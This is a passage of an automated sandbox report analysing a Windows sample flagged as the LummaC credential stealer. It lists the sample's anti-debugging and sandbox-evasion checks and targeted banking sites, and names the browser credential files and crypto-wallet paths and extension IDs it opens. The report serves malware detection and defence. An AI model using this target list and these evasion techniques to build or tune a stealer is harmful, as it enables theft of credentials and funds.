              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: file.exe, file.exe, 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: file.exe, file.exe, 00000000.00000003.2357098669.0000000001192000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2358090011.0000000001192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: file.exe, 00000000.00000003.2226758616.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: file.exe, 00000000.00000002.2358004413.0000000001157000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356614238.0000000001157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: file.exe, 00000000.00000003.2227098478.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2227337300.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2226810302.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2227417690.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2227401951.0000000005ABF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: file.exe, 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: file.exe, 00000000.00000003.2226758616.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5DF70 LdrInitializeThunk,0_2_00B5DF70
              Source: file.exe, file.exe, 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: MProgram Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000002.2360071121.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315638459.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2298164691.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297824927.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2298325612.00000000011EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4416, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exe, 00000000.00000003.2226439484.00000000011EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
              Source: file.exe, 00000000.00000003.2226439484.00000000011EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: file.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe, 00000000.00000003.2226439484.00000000011EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exeString found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000000.00000003.2226439484.00000000011EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ms\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
